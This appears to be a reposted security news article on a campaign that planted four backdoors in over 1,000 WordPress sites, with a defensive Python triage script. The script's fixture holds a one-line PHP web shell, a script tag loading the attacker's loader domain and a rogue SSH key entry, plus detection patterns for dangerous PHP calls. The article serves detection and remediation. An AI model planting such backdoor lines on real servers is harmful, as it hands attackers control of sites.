Over 1,000 WordPress Websites Infected with Multiple Backdoors via Malicious JavaScript


A new threat has emerged: over 1,000 websites running WordPress have been compromised by third-party JavaScript that injects four distinct backdoors into each site. The attack, traced to a domain known for hosting malicious scripts, is still expanding and is a serious concern for WordPress site owners.

In this article, we will delve into the specifics of the attack, explore the functionality of the four backdoors, and provide recommended steps for mitigating the risks posed by this cyberattack. Additionally, we will take a closer look at how this threat aligns with broader trends in cybersecurity.

The Attack

The latest report reveals that over 1,000 WordPress websites have been infected with third-party JavaScript loaded from the domain cdn.csyndication[.]com. The code plants four separate backdoors on each site, giving attackers several independent points of entry. The backdoors serve different purposes: installing a fake plugin, injecting code into a critical configuration file, enabling remote access through an SSH key, and executing remote commands.

The four backdoors are as follows:

  1. Backdoor 1: Installs a fake plugin named “Ultra SEO Processor” that lets attackers execute commands remotely.
  2. Backdoor 2: Injects malicious JavaScript into wp-config.php, a file that should contain nothing but PHP configuration, so that the injected code runs on every request.
  3. Backdoor 3: Adds an attacker-controlled SSH public key to the ~/.ssh/authorized_keys file, giving persistent remote access to the server independent of WordPress.
  4. Backdoor 4: Executes remote commands and downloads additional payloads, potentially opening a reverse shell from the compromised machine.

Experts recommend that affected users delete unauthorized SSH keys, rotate WordPress admin credentials, and carefully monitor system logs for suspicious activity. The order matters: remove the fake plugin, the wp-config.php injection and the rogue SSH key first, then rotate credentials, because credentials rotated while a backdoor is still in place can simply be stolen again. The discovery of this malware comes at a time when another large-scale campaign has compromised more than 35,000 websites, redirecting visitors to Chinese-language gambling platforms.
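The four backdoors above and the clean-up advice translate directly into a file-level triage of a WordPress install. The script below is an added example written for this article, not code from Sucuri, The Hacker News or the WordPress project; it checks for an unexpected plugin directory (and the “Ultra SEO Processor” name specifically), for script tags or dynamic-code primitives inside wp-config.php, for authorized_keys entries whose key material is not on a trusted list, and for any file referencing the cdn.csyndication[.]com loader. The sample WordPress tree, the plugin contents and the SSH key strings it builds are constructed fixtures, not real artefacts from the campaign; the fourth backdoor (remote command execution) is a runtime behaviour and is not something a file scan can confirm, so it is not covered here.

```python
"""Triage a WordPress install for the indicators of the four-backdoor campaign.

Added example for this article; not the code of Sucuri, The Hacker News or
WordPress. Fixture data built by build_fixture() is constructed, not real.
"""
import re
import tempfile
from pathlib import Path

# The loader host, matched in both its live and its defanged ("[.]") form.
DOMAIN_RE = re.compile(r"cdn\.csyndication\[?\.\]?com", re.IGNORECASE)
# wp-config.php should hold only PHP defines and requires; HTML script tags and
# dynamic-code primitives have no legitimate place in it.
CONFIG_RE = re.compile(
    r"<script\b|\beval\s*\(|base64_decode\s*\(|gzinflate\s*\(|shell_exec\s*\(|\bsystem\s*\(",
    re.IGNORECASE,
)
# The fake plugin name from this campaign, matched loosely against the slug.
FAKE_PLUGIN_RE = re.compile(r"ultra[-_ ]?seo[-_ ]?processor", re.IGNORECASE)
# Prefixes of the key-type field in an authorized_keys entry.
KEY_TYPES = ("ssh-", "ecdsa-", "sk-")


def unexpected_plugins(wp_root, allowlist):
    """Plugin directories that are not on the site's allowlist; the campaign's
    fake plugin is flagged even if someone mistakenly allowlisted it."""
    plugins_dir = Path(wp_root) / "wp-content" / "plugins"
    if not plugins_dir.is_dir():
        return []
    return sorted(p.name for p in plugins_dir.iterdir()
                  if p.is_dir() and (p.name not in allowlist or FAKE_PLUGIN_RE.search(p.name)))


def suspicious_config_lines(wp_root):
    """(line number, text) pairs in wp-config.php matching the injection patterns."""
    cfg = Path(wp_root) / "wp-config.php"
    if not cfg.is_file():
        return []
    return [(n, line.strip())
            for n, line in enumerate(cfg.read_text(errors="replace").splitlines(), 1)
            if CONFIG_RE.search(line)]


def parse_authorized_keys(text):
    """Yield (key_type, key_data, comment) per entry, tolerating a leading
    options field such as command="..." and skipping comments and blank lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        for i, tok in enumerate(tokens):
            if tok.startswith(KEY_TYPES) and i + 1 < len(tokens):
                yield tok, tokens[i + 1], " ".join(tokens[i + 2:])
                break


def unknown_ssh_keys(authorized_keys_path, trusted_key_data):
    """Entries whose public-key material is not in the trusted set. Match on the
    key data, not the comment: an attacker chooses the comment and can copy
    the administrator's."""
    path = Path(authorized_keys_path)
    if not path.is_file():
        return []
    return [entry for entry in parse_authorized_keys(path.read_text())
            if entry[1] not in trusted_key_data]


def files_referencing_domain(wp_root):
    """Relative paths of text files under the install that reference the loader host."""
    root = Path(wp_root)
    exts = {".php", ".js", ".html", ".htm", ".txt", ".json"}
    return sorted(str(p.relative_to(root)) for p in root.rglob("*")
                  if p.is_file() and p.suffix.lower() in exts
                  and DOMAIN_RE.search(p.read_text(errors="replace")))


def triage(wp_root, authorized_keys_path, allowlisted_plugins, trusted_key_data):
    """Run the file-level checks and return the findings keyed by backdoor."""
    return {
        "backdoor1_fake_plugin": unexpected_plugins(wp_root, allowlisted_plugins),
        "backdoor2_wp_config": suspicious_config_lines(wp_root),
        "backdoor3_ssh_keys": unknown_ssh_keys(authorized_keys_path, trusted_key_data),
        "loader_domain_refs": files_referencing_domain(wp_root),
    }


# Constructed key strings for the fixture; not real keys.
TRUSTED_KEY = "AAAAC3NzaC1lZDI1NTE5AAAAIExampleTrustedKeyMaterial0000000000000"
ATTACKER_KEY = "AAAAC3NzaC1lZDI1NTE5AAAAIAttackerAddedKeyMaterial1111111111111"


def build_fixture():
    """Constructed sample WordPress tree reproducing the indicators.
    Returns (wp_root, authorized_keys_path)."""
    root = Path(tempfile.mkdtemp(prefix="wp-triage-"))
    plugins = root / "wp-content" / "plugins"
    (plugins / "akismet").mkdir(parents=True)
    (plugins / "akismet" / "akismet.php").write_text("<?php // legitimate plugin stub\n")
    fake = plugins / "ultra-seo-processor"
    fake.mkdir()
    (fake / "ultra-seo-processor.php").write_text(
        '<?php /* Plugin Name: Ultra SEO Processor */\n'
        'if (isset($_POST["cmd"])) { eval(base64_decode($_POST["cmd"])); }\n')
    (root / "wp-config.php").write_text(
        "<?php\n"
        "define('DB_NAME', 'wordpress');\n"
        "define('DB_USER', 'wp');\n"
        "echo '<script src=\"https://cdn.csyndication[.]com/js/loader.js\"></script>';\n"
        "require_once ABSPATH . 'wp-settings.php';\n")
    ak = root / "authorized_keys"
    # The rogue entry reuses the admin's comment; only the key data gives it away.
    ak.write_text("# admin workstation\n"
                  f"ssh-ed25519 {TRUSTED_KEY} admin@laptop\n"
                  f'command="/bin/sh" ssh-ed25519 {ATTACKER_KEY} admin@laptop\n')
    return str(root), str(ak)


if __name__ == "__main__":
    wp_root, ak_path = build_fixture()
    for name, hits in triage(wp_root, ak_path, {"akismet"}, {TRUSTED_KEY}).items():
        print(name, hits)
```

On a live server, point triage() at the real document root and at the authorized_keys file of the account the web server or deploy user runs as, and feed it the plugin list and public keys you actually manage; any hit is a reason to treat the host as compromised rather than to clean the single file.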

What Undercode Says:

The growing prevalence of website compromises, especially those involving WordPress, raises serious concerns about the security of widely used platforms. WordPress remains the most popular content management system, which makes it a prime target for cybercriminals. That over 1,000 sites were compromised by an attack that plants four independent backdoors underlines the need for heightened vigilance among WordPress users.

Planting multiple backdoors is not a new technique, but it is particularly alarming here because of the variety of footholds it creates. Each backdoor serves a different purpose, so if one is detected and removed, the others still give the attackers persistent access. A clean-up that removes only the fake plugin, for example, leaves the SSH key and the wp-config.php injection in place, which is why the remediation has to cover all four.

The campaign is a reminder that securing a website requires a multi-layered approach. The infection does not stop at the initial JavaScript injection; it also relies on additional tactics such as writing code into critical files like wp-config.php and adding SSH keys for remote access, which means a fix limited to the web application (for example, removing the offending script tag) does not restore control of the server.

The scale of this attack is also concerning. Over 35,000 websites have already been affected by a separate malware campaign that redirects visitors to gambling sites. While the two attacks come from different actors, they share a common theme: JavaScript as the delivery vehicle. This type of malware often flies under the radar because the injected script is served alongside the site’s legitimate content, so administrators rarely notice it unless they inspect page source or the outbound script loads their pages make.

What is clear is that cybercriminals are evolving their techniques, taking advantage of weaknesses that may have been overlooked or underestimated. In many cases, website owners may not even be aware that their sites have been compromised, especially when the malware lies dormant, ready to be activated when least expected.

Furthermore, as seen with the ScreamedJungle threat actor, attackers are increasingly leveraging browser fingerprinting techniques to track users and evade security measures. Fingerprint data can be used to mimic legitimate behavior, making fraudulent activity even harder to detect. It is a reminder of how crucial it is for businesses to maintain strong website security and stay current on emerging threats.

In light of these threats, WordPress site owners should take proactive steps to harden their websites. This includes keeping plugins and themes updated, using strong, unique passwords, regularly scanning for vulnerabilities and unexpected files, and employing additional layers of security such as two-factor authentication (2FA) and a Web Application Firewall (WAF).

Fact Checker Results:

  • Backdoor Identification: The four backdoors serve distinct roles and carry significant risk, including unauthorized command execution and persistent remote access to the server.
  • Increased Attack Frequency: The scale of these attacks is part of a growing trend of targeting WordPress websites, which remain a top target because of their widespread use.
  • Gambling Redirection Malware: The campaign redirecting visitors to gambling sites highlights the broader trend of cybercriminals monetizing compromised websites through redirections and other fraudulent schemes.

References:

Reported By: https://thehackernews.com/2025/03/over-1000-wordpress-sites-infected-with.html
Extra Source Hub: https://www.medium.com
Wikipedia: https://www.wikipedia.org
Undercode AI
